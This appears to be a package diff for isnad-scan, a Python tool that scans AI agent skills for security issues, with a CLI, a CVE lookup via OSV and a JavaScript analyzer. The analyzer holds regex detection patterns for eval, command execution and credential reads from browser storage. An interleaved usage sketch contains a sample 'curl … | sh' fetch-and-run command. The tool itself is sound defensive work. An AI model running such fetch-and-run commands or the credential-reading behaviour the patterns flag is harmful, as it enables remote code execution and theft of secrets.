isnad_scan-0.3.0-py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
isnad_scan/cli.py ADDED
@@ -0,0 +1,221 @@
1
+ """CLI entry point for ISNAD Skill Scanner."""
2
+ import json
3
+ import sys
4
+ from typing import Optional
5
+
6
+ import click
7
+ from rich.console import Console
8
+ from rich.table import Table
9
+ from rich.panel import Panel
10
+ from rich.text import Text
11
+
12
+ from . import __version__
13
+ from .scanner import scan_skill, ScanResult
14
+ from .patterns import Severity
15
+
16
+
17
+ console = Console()
18
+
19
+
20
+ def format_severity(severity: Severity) -> Text:
21
+ """Format severity with color."""
22
+ colors = {
23
+ Severity.DANGER: "red bold",
24
+ Severity.WARN: "yellow",
25
+ Severity.INFO: "blue",
26
+ }
27
+ return Text(severity.value.upper(), style=colors.get(severity, "white"))
28
+
29
+
30
+ def format_trust_level(level: str) -> Text:
31
+ """Format trust level with color and emoji."""
32
+ config = {
33
+ "DANGER": ("🚨", "red bold"),
34
+ "WARN": ("āš ļø ", "yellow bold"),
35
+ "CAUTION": ("⚔", "yellow"),
36
+ "SAFE": ("āœ…", "green bold"),
37
+ }
38
+ emoji, style = config.get(level, ("", "white"))
39
+ return Text(f"{emoji} {level}", style=style)
40
+
41
+
42
+ def print_result(result: ScanResult, verbose: bool = False, show_hash: bool = False):
43
+ """Print scan result in human-readable format."""
44
+ console.print()
45
+
46
+ # Header with trust level
47
+ level_text = format_trust_level(result.trust_level)
48
+ console.print(Panel(
49
+ Text.assemble("Trust Level: ", level_text),
50
+ title=f"[bold]ISNAD Scan: {result.path}[/bold]",
51
+ border_style="blue"
52
+ ))
53
+
54
+ # Summary stats
55
+ summary = result.summary()
56
+ console.print(f"\nšŸ“ Files scanned: {summary['files_scanned']}")
57
+ console.print(f"ā­ļø Files skipped: {summary['files_skipped']}")
58
+
59
+ if show_hash and result.content_hash:
60
+ console.print(f"šŸ”‘ Content hash: {result.content_hash}")
61
+
62
+ # Findings summary
63
+ findings = summary['findings']
64
+ if findings['danger'] > 0:
65
+ console.print(f"🚨 [red bold]DANGER findings: {findings['danger']}[/red bold]")
66
+ if findings['warn'] > 0:
67
+ console.print(f"āš ļø [yellow]WARN findings: {findings['warn']}[/yellow]")
68
+ if findings['info'] > 0 and verbose:
69
+ console.print(f"ā„¹ļø [blue]INFO findings: {findings['info']}[/blue]")
70
+
71
+ # Symlinks
72
+ if result.symlinks_found:
73
+ console.print(f"šŸ”— [red]Unsafe symlinks: {len(result.symlinks_found)}[/red]")
74
+
75
+ # Warnings
76
+ if result.warnings and verbose:
77
+ console.print(f"⚔ Warnings: {len(result.warnings)}")
78
+
79
+ # Detailed findings grouped by severity
80
+ if result.findings:
81
+ console.print("\n[bold]Findings:[/bold]\n")
82
+
83
+ # Group and sort by severity
84
+ for severity in [Severity.DANGER, Severity.WARN, Severity.INFO]:
85
+ severity_findings = [f for f in result.findings if f.severity == severity]
86
+
87
+ if not severity_findings:
88
+ continue
89
+
90
+ if severity == Severity.INFO and not verbose:
91
+ continue
92
+
93
+ # Group similar findings by (pattern_id, file) so repeats are reported once
94
+ seen_patterns = {}
95
+ for finding in severity_findings:
96
+ key = (finding.pattern_id, finding.file)
97
+ if key not in seen_patterns:
98
+ seen_patterns[key] = []
99
+ seen_patterns[key].append(finding)
100
+
101
+ for (pattern_id, file), file_findings in seen_patterns.items():
102
+ sev_text = format_severity(file_findings[0].severity)
103
+
104
+ if len(file_findings) == 1:
105
+ f = file_findings[0]
106
+ console.print(Text.assemble(
107
+ "[", sev_text, "] ",
108
+ f"{f.file}:{f.line} — ",
109
+ (f.pattern_id, "cyan"),
110
+ ))
111
+ console.print(f" {f.description}")
112
+ if f.context and verbose:
113
+ console.print(f" [dim]{f.context}[/dim]")
114
+ else:
115
+ # Multiple occurrences
116
+ lines = [str(f.line) for f in file_findings[:5]]
117
+ line_str = ",".join(lines) + ("..." if len(file_findings) > 5 else "")
118
+ console.print(Text.assemble(
119
+ "[", sev_text, "] ",
120
+ f"{file}:{{{line_str}}} — ",
121
+ (pattern_id, "cyan"),
122
+ f" ({len(file_findings)} occurrences)",
123
+ ))
124
+ console.print(f" {file_findings[0].description}")
125
+
126
+ console.print()
127
+
128
+ # Errors
129
+ if result.errors:
130
+ console.print("[red bold]Errors:[/red bold]")
131
+ for error in result.errors:
132
+ console.print(f" āŒ {error}")
133
+
134
+ # Warnings (verbose only)
135
+ if result.warnings and verbose:
136
+ console.print("\n[yellow]Warnings:[/yellow]")
137
+ for warning in result.warnings:
138
+ console.print(f" ⚔ {warning}")
139
+
140
+ console.print()
141
+
142
+
143
+ def print_json(result: ScanResult):
144
+ """Print scan result as JSON."""
145
+ output = {
146
+ "version": __version__,
147
+ "path": result.path,
148
+ "trust_level": result.trust_level,
149
+ "content_hash": result.content_hash,
150
+ "summary": result.summary(),
151
+ "findings": [
152
+ {
153
+ "severity": f.severity.value,
154
+ "pattern_id": f.pattern_id,
155
+ "description": f.description,
156
+ "file": f.file,
157
+ "line": f.line,
158
+ "match": f.match,
159
+ "context": f.context,
160
+ }
161
+ for f in result.findings
162
+ ],
163
+ "symlinks": result.symlinks_found,
164
+ "errors": result.errors,
165
+ "warnings": result.warnings,
166
+ }
167
+ print(json.dumps(output, indent=2))
168
+
169
+
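For downstream tooling, the --json output above can be consumed programmatically. A minimal sketch using click's test runner against a hypothetical skill directory; severity strings are assumed to be the lowercase enum values ('danger', 'warn', 'info') that summary() also uses:

import json

from click.testing import CliRunner

from isnad_scan.cli import main

runner = CliRunner()
# Hypothetical skill directory; any local path works the same way.
res = runner.invoke(main, ["./skills/my-skill/", "--json"])
report = json.loads(res.output)

# Keys mirror print_json() above: trust_level, summary, findings, symlinks, ...
print(report.get("trust_level"), res.exit_code)
for f in report.get("findings", []):
    if f["severity"] == "danger":
        print(f'{f["file"]}:{f["line"]} {f["pattern_id"]}: {f["description"]}')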
170
+ @click.command()
171
+ @click.argument('path')
172
+ @click.option('--json', 'output_json', is_flag=True, help='Output as JSON')
173
+ @click.option('--verbose', '-v', is_flag=True, help='Show INFO findings and extra details')
174
+ @click.option('--hash', 'show_hash', is_flag=True, help='Show content hash')
175
+ @click.version_option(__version__, '--version', message='isnad-scan %(version)s')
176
+ @click.option('--quiet', '-q', is_flag=True, help='Only output trust level')
177
+ @click.option('--cve', 'check_cves', is_flag=True, help='Check dependencies against CVE database (requires network)')
178
+ def main(path: str, output_json: bool, verbose: bool, show_hash: bool, quiet: bool, check_cves: bool):
179
+ """
180
+ Scan an agent skill for security issues.
181
+
182
+ PATH can be a local directory or file.
183
+
184
+ \b
185
+ Exit codes:
186
+ 0 = SAFE - No issues found
187
+ 1 = CAUTION - Minor issues, review recommended
188
+ 2 = DANGER - Security issues detected
189
+ 3 = ERROR - Scanner error
190
+
191
+ \b
192
+ Examples:
193
+ isnad-scan ./skills/my-skill/
194
+ isnad-scan ./skills/my-skill/ --json
195
+ isnad-scan ./skills/my-skill/ -v --hash
196
+ """
201
+ try:
202
+ result = scan_skill(path, check_cves=check_cves)
203
+ except Exception as e:
204
+ if output_json:
205
+ print(json.dumps({"error": str(e)}))
206
+ else:
207
+ console.print(f"[red]Error:[/red] {e}")
208
+ sys.exit(3)
209
+
210
+ if quiet:
211
+ print(result.trust_level)
212
+ elif output_json:
213
+ print_json(result)
214
+ else:
215
+ print_result(result, verbose=verbose, show_hash=show_hash)
216
+
217
+ sys.exit(result.exit_code)
218
+
219
+
220
+ if __name__ == "__main__":
221
+ main()
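The exit codes documented in the command help map naturally onto a CI gate. A minimal sketch, assuming the isnad-scan console script is installed; the skill path is illustrative:

import subprocess
import sys

# Exit codes as documented in the command help above:
# 0 = SAFE, 1 = CAUTION, 2 = DANGER, 3 = ERROR.
LABELS = {0: "SAFE", 1: "CAUTION", 2: "DANGER", 3: "ERROR"}

# Hypothetical skill path; --quiet limits output to the trust level.
proc = subprocess.run(["isnad-scan", "./skills/my-skill/", "--quiet"])
print(f"isnad-scan exited with {proc.returncode} ({LABELS.get(proc.returncode, 'UNKNOWN')})")

# Fail a CI job on DANGER or scanner errors; let CAUTION pass with a warning.
if proc.returncode in (2, 3):
    sys.exit(1)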
@@ -0,0 +1,238 @@
1
+ """CVE database integration using OSV (Open Source Vulnerabilities).
2
+
3
+ Checks dependencies against known vulnerabilities without requiring API keys.
4
+ Uses the OSV.dev API which covers PyPI, npm, and other ecosystems.
5
+ """
6
+ import json
7
+ import re
8
+ import urllib.request
9
+ import urllib.error
10
+ from dataclasses import dataclass
11
+ from typing import List, Optional, Dict, Tuple
12
+ from pathlib import Path
13
+
14
+ from .patterns import Finding, Severity
15
+
16
+
17
+ OSV_API_URL = "https://api.osv.dev/v1/query"
18
+ OSV_BATCH_URL = "https://api.osv.dev/v1/querybatch"
19
+
20
+ # Cache for OSV responses (in-memory, per-session)
21
+ _osv_cache: Dict[str, List[dict]] = {}
22
+
23
+
24
+ @dataclass
25
+ class PackageVersion:
26
+ """A package with optional version constraint."""
27
+ name: str
28
+ version: Optional[str] = None
29
+ ecosystem: str = "PyPI" # PyPI, npm, Go, etc.
30
+
31
+ def to_osv_query(self) -> dict:
32
+ """Convert to OSV API query format."""
33
+ query = {
34
+ "package": {
35
+ "name": self.name,
36
+ "ecosystem": self.ecosystem,
37
+ }
38
+ }
39
+ if self.version:
40
+ query["version"] = self.version
41
+ return query
42
+
43
+
44
+ def parse_requirements_txt(content: str) -> List[PackageVersion]:
45
+ """Parse requirements.txt format."""
46
+ packages = []
47
+
48
+ for line in content.split('\n'):
49
+ line = line.strip()
50
+
51
+ # Skip comments and empty lines
52
+ if not line or line.startswith('#') or line.startswith('-'):
53
+ continue
54
+
55
+ # Skip URLs and paths
56
+ if line.startswith(('http://', 'https://', 'git+', '/', '.')):
57
+ continue
58
+
59
+ # Parse package==version, package>=version, etc.
60
+ match = re.match(r'^([a-zA-Z0-9_-]+)\s*(?:[=<>!~]+\s*([0-9][a-zA-Z0-9._-]*))?', line)
61
+ if match:
62
+ name = match.group(1).lower()
63
+ version = match.group(2)
64
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
65
+
66
+ return packages
67
+
68
+
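A quick usage sketch of the parser above, also showing the OSV payload that to_osv_query() builds. The module path is an assumption (this diff omits the file name) and the pins are illustrative:

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.cve_check import parse_requirements_txt

reqs = """\
# runtime deps (illustrative pins)
requests==2.19.0
flask>=2.0
-r other-requirements.txt
https://example.com/vendored.tar.gz
"""

for pkg in parse_requirements_txt(reqs):
    # Comments, "-r" includes and URLs are skipped by the parser above.
    print(pkg.name, pkg.version, pkg.to_osv_query())
# Roughly:
#   requests 2.19.0 {'package': {'name': 'requests', 'ecosystem': 'PyPI'}, 'version': '2.19.0'}
#   flask 2.0 {'package': {'name': 'flask', 'ecosystem': 'PyPI'}, 'version': '2.0'}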
69
+ def parse_package_json(content: str) -> List[PackageVersion]:
70
+ """Parse package.json dependencies."""
71
+ packages = []
72
+
73
+ try:
74
+ data = json.loads(content)
75
+ except json.JSONDecodeError:
76
+ return packages
77
+
78
+ for dep_key in ('dependencies', 'devDependencies', 'peerDependencies'):
79
+ deps = data.get(dep_key, {})
80
+ for name, version_spec in deps.items():
81
+ # Extract version number from spec like "^1.2.3", "~1.2.3", ">=1.0.0"
82
+ version_match = re.search(r'(\d+\.\d+\.\d+)', version_spec)
83
+ version = version_match.group(1) if version_match else None
84
+ packages.append(PackageVersion(name=name, version=version, ecosystem="npm"))
85
+
86
+ return packages
87
+
88
+
89
+ def parse_pyproject_toml(content: str) -> List[PackageVersion]:
90
+ """Parse pyproject.toml dependencies (simple parsing, not full TOML)."""
91
+ packages = []
92
+
93
+ in_deps = False
94
+ for line in content.split('\n'):
95
+ line = line.strip()
96
+
97
+ if line.startswith('[') and 'dependencies' in line.lower():
98
+ in_deps = True
99
+ continue
100
+ elif line.startswith('['):
101
+ in_deps = False
102
+ continue
103
+
104
+ if in_deps and '=' in line:
105
+ # Handle: package = ">=1.0"
106
+ match = re.match(r'^([a-zA-Z0-9_-]+)\s*=\s*["\']?([^"\']+)?', line)
107
+ if match:
108
+ name = match.group(1).lower()
109
+ version_spec = match.group(2) or ''
110
+ version_match = re.search(r'(\d+\.\d+\.?\d*)', version_spec)
111
+ version = version_match.group(1) if version_match else None
112
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
113
+ elif in_deps and line and not line.startswith('#'):
114
+ # Handle list format: "package>=1.0",
115
+ match = re.match(r'^["\']?([a-zA-Z0-9_-]+)', line)
116
+ if match:
117
+ name = match.group(1).lower()
118
+ version_match = re.search(r'(\d+\.\d+\.?\d*)', line)
119
+ version = version_match.group(1) if version_match else None
120
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
121
+
122
+ return packages
123
+
124
+
125
+ def query_osv(packages: List[PackageVersion], timeout: float = 10.0) -> Dict[str, List[dict]]:
126
+ """Query OSV API for vulnerabilities in packages."""
127
+ if not packages:
128
+ return {}
129
+
130
+ results = {}
131
+
132
+ # Use batch API for efficiency
133
+ queries = [pkg.to_osv_query() for pkg in packages]
134
+
135
+ try:
136
+ request_data = json.dumps({"queries": queries}).encode('utf-8')
137
+ req = urllib.request.Request(
138
+ OSV_BATCH_URL,
139
+ data=request_data,
140
+ headers={'Content-Type': 'application/json'},
141
+ method='POST'
142
+ )
143
+
144
+ with urllib.request.urlopen(req, timeout=timeout) as response:
145
+ data = json.loads(response.read())
146
+ except (urllib.error.URLError, urllib.error.HTTPError, TimeoutError, json.JSONDecodeError):
147
+ # Network error - return empty but don't fail the scan
148
+ return {}
149
+
150
+ # Parse batch response
151
+ for i, result in enumerate(data.get('results', [])):
152
+ if i < len(packages):
153
+ vulns = result.get('vulns', [])
154
+ if vulns:
155
+ pkg = packages[i]
156
+ key = f"{pkg.ecosystem}:{pkg.name}"
157
+ results[key] = vulns
158
+
159
+ return results
160
+
161
+
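query_osv() can be exercised directly to see the shape of the batch response. Network access is required; the module path is an assumption and the pinned version is simply an old release chosen for illustration:

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.cve_check import PackageVersion, query_osv

pkgs = [PackageVersion(name="requests", version="2.19.0", ecosystem="PyPI")]
vulns_by_pkg = query_osv(pkgs, timeout=10.0)

# Keys are "<ecosystem>:<name>"; values are raw OSV records, which carry
# fields such as "id" (CVE/GHSA/PYSEC identifiers) and "summary".
for key, vulns in vulns_by_pkg.items():
    for vuln in vulns:
        print(key, vuln.get("id"), (vuln.get("summary") or "")[:80])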
162
+ def check_dependencies_for_cves(content: str, filename: str, timeout: float = 10.0) -> List[Finding]:
163
+ """Check a dependency file for known CVEs."""
164
+ findings = []
165
+
166
+ # Parse based on file type
167
+ fname = Path(filename).name.lower()
168
+
169
+ if fname == 'requirements.txt' or fname.startswith('requirements'):
170
+ packages = parse_requirements_txt(content)
171
+ elif fname == 'package.json':
172
+ packages = parse_package_json(content)
173
+ elif fname == 'pyproject.toml':
174
+ packages = parse_pyproject_toml(content)
175
+ else:
176
+ return findings
177
+
178
+ if not packages:
179
+ return findings
180
+
181
+ # Query OSV for vulnerabilities
182
+ vulns_by_pkg = query_osv(packages, timeout=timeout)
183
+
184
+ # Generate findings for vulnerable packages
185
+ for pkg in packages:
186
+ key = f"{pkg.ecosystem}:{pkg.name}"
187
+ vulns = vulns_by_pkg.get(key, [])
188
+
189
+ for vuln in vulns:
190
+ vuln_id = vuln.get('id', 'UNKNOWN')
191
+ summary = vuln.get('summary', 'No summary available')
192
+ severity_data = vuln.get('severity', [])
193
+
194
+ # Determine severity from CVSS if available
195
+ severity = Severity.WARN
196
+ cvss_score = None
197
+ for s in severity_data:
198
+ if 'score' in s:
199
+ try:
200
+ cvss_score = float(s['score'])
201
+ if cvss_score >= 7.0:
202
+ severity = Severity.DANGER
205
+ elif cvss_score >= 4.0:
206
+ severity = Severity.WARN
207
+ except (ValueError, TypeError):
208
+ pass
209
+
210
+ # High severity CVEs are DANGER
211
+ if vuln_id.startswith('CVE-') or vuln_id.startswith('GHSA-'):
212
+ if any(kw in summary.lower() for kw in ('remote code', 'rce', 'arbitrary code', 'command injection', 'sql injection')):
213
+ severity = Severity.DANGER
214
+
215
+ findings.append(Finding(
216
+ severity=severity,
217
+ pattern_id='known_vulnerability',
218
+ description=f'{vuln_id}: {summary[:150]}',
219
+ file=filename,
220
+ line=1, # We don't track line numbers in deps
221
+ match=f'{pkg.name}=={pkg.version}' if pkg.version else pkg.name,
222
+ context=f'CVSS: {cvss_score}' if cvss_score else '',
223
+ ))
224
+
225
+ return findings
226
+
227
+
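Putting the helpers together, a dependency file can be checked end to end. The module path is an assumption, the file location is illustrative, and network access is required:

from pathlib import Path

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.cve_check import check_dependencies_for_cves

req_path = Path("requirements.txt")  # illustrative location
findings = check_dependencies_for_cves(
    req_path.read_text(encoding="utf-8"),
    str(req_path),
    timeout=10.0,
)

for finding in findings:
    # Finding fields populated above: severity, pattern_id, description, match, context.
    print(finding.severity.value, finding.match, finding.description)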
228
+ def check_cves_enabled() -> bool:
229
+ """Check if CVE checking is available (has network access)."""
230
+ try:
231
+ req = urllib.request.Request(
232
+ "https://api.osv.dev/v1/",
233
+ method='HEAD'
234
+ )
235
+ with urllib.request.urlopen(req, timeout=2.0):
236
+ return True
237
+ except Exception:
238
+ return False
@@ -0,0 +1,154 @@
1
+ """JavaScript-specific analysis including minified code handling.
2
+
3
+ Handles:
4
+ - Minified/bundled JS detection and basic unminification
5
+ - JS-specific dangerous patterns
6
+ - Node.js specific risks
7
+ """
8
+ import re
9
+ from typing import List, Tuple
10
+
11
+ from .patterns import Finding, Severity
12
+
13
+
14
+ def is_minified_js(content: str) -> bool:
15
+ """Detect if JavaScript content is minified."""
16
+ lines = content.split('\n')
17
+
18
+ # If file has very few lines but lots of content, likely minified
19
+ if len(lines) < 10 and len(content) > 5000:
20
+ return True
21
+
22
+ # Check average line length (minified = very long lines)
23
+ non_empty_lines = [l for l in lines if l.strip()]
24
+ if non_empty_lines:
25
+ avg_length = sum(len(l) for l in non_empty_lines) / len(non_empty_lines)
26
+ if avg_length > 500:
27
+ return True
28
+
29
+ # Check for lack of whitespace (minified removes most whitespace)
30
+ if len(content) > 1000:
31
+ whitespace_ratio = content.count(' ') / len(content)
32
+ if whitespace_ratio < 0.05:
33
+ return True
34
+
35
+ return False
36
+
37
+
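The heuristics above can be seen firing on synthetic input. The strings are purely illustrative and the module path is an assumption (this diff omits the file name):

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.js_analysis import is_minified_js

# One ~6000-character line with almost no whitespace: trips both the
# "few lines but lots of content" and the average-line-length checks.
packed = "var a=1;" + "f(a);" * 1200
# Two hundred short, normally spaced lines: none of the heuristics fire.
readable = "\n".join(f"const value_{i} = {i};" for i in range(200))

print(is_minified_js(packed))    # expected: True
print(is_minified_js(readable))  # expected: False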
38
+ def basic_unminify(content: str) -> str:
39
+ """
40
+ Basic unminification to make patterns more detectable.
41
+ This is NOT a full beautifier, just enough to expose dangerous patterns.
42
+ """
43
+ # Add newlines after common statement endings
44
+ content = re.sub(r';(?=[^\s])', ';\n', content)
45
+ content = re.sub(r'\{(?=[^\s])', '{\n', content)
46
+ content = re.sub(r'\}(?=[^\s])', '}\n', content)
47
+
48
+ # Add spaces around operators to expose patterns
49
+ content = re.sub(r'([=<>!]+)', r' \1 ', content)
50
+
51
+ return content
52
+
53
+
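As a small illustration of the rewrite, a packed statement is split so the interesting calls land on their own lines (module path assumed as above; output shown approximately):

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.js_analysis import basic_unminify

packed = "var a=1;if(a){eval(s)}fetch(u)"
print(basic_unminify(packed))
# Approximately:
#   var a = 1;
#   if(a){
#   eval(s)}
#   fetch(u)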
54
+ def analyze_javascript(content: str, filename: str) -> List[Finding]:
55
+ """Analyze JavaScript code for dangerous patterns."""
56
+ findings = []
57
+ original_content = content
58
+
59
+ # Check if minified
60
+ minified = is_minified_js(content)
61
+ if minified:
62
+ findings.append(Finding(
63
+ severity=Severity.WARN,
64
+ pattern_id='minified_javascript',
65
+ description='Minified JavaScript detected - harder to audit, may hide malicious code',
66
+ file=filename,
67
+ line=1,
68
+ match='<minified>',
69
+ context=f'File size: {len(content)} bytes, few lines',
70
+ ))
71
+ # Unminify for analysis
72
+ content = basic_unminify(content)
73
+
74
+ lines = content.split('\n')
75
+
76
+ # JS-specific patterns that need context
77
+ js_patterns = [
78
+ # Dynamic code execution
79
+ (r'\beval\s*\(', 'js_eval', Severity.DANGER, 'eval() in JavaScript'),
80
+ (r'new\s+Function\s*\(', 'js_function_constructor', Severity.DANGER, 'Function constructor (eval equivalent)'),
81
+ (r'setTimeout\s*\(\s*["\'][^"\']*["\']', 'js_settimeout_string', Severity.DANGER, 'setTimeout with string (implicit eval)'),
82
+ (r'setInterval\s*\(\s*["\'][^"\']*["\']', 'js_setinterval_string', Severity.DANGER, 'setInterval with string (implicit eval)'),
83
+
84
+ # Dangerous Node.js APIs
85
+ (r'child_process', 'js_child_process', Severity.WARN, 'child_process module - command execution'),
86
+ (r'\.exec\s*\(', 'js_exec', Severity.WARN, 'exec() call - may be command execution'),
87
+ (r'\.execSync\s*\(', 'js_exec_sync', Severity.DANGER, 'execSync() - synchronous command execution'),
88
+ (r'require\s*\(\s*["\']child_process["\']', 'js_require_child_process', Severity.DANGER, 'Requiring child_process module'),
89
+
90
+ # Prototype pollution
91
+ (r'__proto__', 'js_proto_access', Severity.WARN, '__proto__ access - prototype pollution risk'),
92
+ (r'constructor\s*\[\s*["\']prototype["\']', 'js_constructor_proto', Severity.DANGER, 'Prototype access via constructor'),
93
+ (r'Object\.assign\s*\([^,]+,\s*[^)]+\)', 'js_object_assign', Severity.INFO, 'Object.assign - check for prototype pollution'),
94
+
95
+ # DOM XSS sinks
96
+ (r'\.innerHTML\s*=', 'js_innerhtml', Severity.WARN, 'innerHTML assignment - XSS risk'),
97
+ (r'\.outerHTML\s*=', 'js_outerhtml', Severity.WARN, 'outerHTML assignment - XSS risk'),
98
+ (r'document\.write\s*\(', 'js_document_write', Severity.WARN, 'document.write - XSS risk'),
99
+ (r'\.insertAdjacentHTML\s*\(', 'js_insert_html', Severity.WARN, 'insertAdjacentHTML - XSS risk'),
100
+
101
+ # Dangerous URL handling
102
+ (r'location\s*=|location\.href\s*=', 'js_location_assign', Severity.WARN, 'Location assignment - open redirect risk'),
103
+ (r'window\.open\s*\(', 'js_window_open', Severity.INFO, 'window.open - popup/redirect'),
104
+
105
+ # Fetch/XHR to unknown destinations
106
+ (r'fetch\s*\(\s*[^"\'`]', 'js_fetch_dynamic', Severity.WARN, 'Fetch with dynamic URL'),
107
+ (r'XMLHttpRequest', 'js_xhr', Severity.INFO, 'XMLHttpRequest usage'),
108
+
109
+ # Credential access patterns
110
+ (r'localStorage\.getItem\s*\([^)]*(?:token|key|secret|password|credential)', 'js_localstorage_cred', Severity.WARN, 'Reading credentials from localStorage'),
111
+ (r'sessionStorage\.getItem\s*\([^)]*(?:token|key|secret|password|credential)', 'js_sessionstorage_cred', Severity.WARN, 'Reading credentials from sessionStorage'),
112
+ (r'document\.cookie', 'js_cookie_access', Severity.INFO, 'Cookie access'),
113
+
114
+ # WebSocket (may exfiltrate data)
115
+ (r'new\s+WebSocket\s*\(', 'js_websocket', Severity.INFO, 'WebSocket connection'),
116
+
117
+ # Obfuscation indicators
118
+ (r'\\x[0-9a-fA-F]{2}(\\x[0-9a-fA-F]{2}){5,}', 'js_hex_string', Severity.WARN, 'Hex-encoded string in JS'),
119
+ (r'\\u[0-9a-fA-F]{4}(\\u[0-9a-fA-F]{4}){5,}', 'js_unicode_string', Severity.WARN, 'Unicode-encoded string in JS'),
120
+ (r'atob\s*\(', 'js_atob', Severity.WARN, 'Base64 decoding (atob)'),
121
+ (r'String\.fromCharCode\s*\([^)]{20,}\)', 'js_fromcharcode', Severity.WARN, 'String.fromCharCode - potential obfuscation'),
122
+ ]
123
+
124
+ for pattern, pattern_id, severity, description in js_patterns:
125
+ for match in re.finditer(pattern, content, re.IGNORECASE):
126
+ # Find line number in potentially unminified content
127
+ line_num = content[:match.start()].count('\n') + 1
128
+
129
+ # Get context
130
+ if line_num <= len(lines):
131
+ context = lines[line_num - 1].strip()[:200]
132
+ else:
133
+ context = match.group(0)[:100]
134
+
135
+ # Note if found in minified code (use a local copy so the suffix is
136
+ # not appended again for every match of the same pattern)
137
+ desc = description + ' (found in minified code)' if minified else description
138
+
139
+ findings.append(Finding(
140
+ severity=severity,
141
+ pattern_id=pattern_id,
142
+ description=desc,
143
+ file=filename,
144
+ line=line_num,
145
+ match=match.group(0)[:100],
146
+ context=context,
147
+ ))
148
+
149
+ return findings
150
+
151
+
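A short usage sketch of the analyzer on a deliberately suspicious snippet. The module path is an assumption and the snippet is illustrative:

# Module path is an assumption (the file name is not shown in this diff).
from isnad_scan.js_analysis import analyze_javascript

snippet = """
const cp = require('child_process');
cp.execSync('curl https://example.com/install.sh | sh');
eval(atob(payload));
"""

for finding in analyze_javascript(snippet, "install.js"):
    print(finding.severity.value, finding.pattern_id, f"line {finding.line}")
# Expect hits such as js_require_child_process, js_child_process,
# js_exec_sync, js_eval and js_atob from the pattern table above.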
152
+ def is_javascript_file(filename: str) -> bool:
153
+ """Check if a file is JavaScript."""
154
+ return filename.endswith(('.js', '.mjs', '.cjs', '.jsx', '.ts', '.tsx'))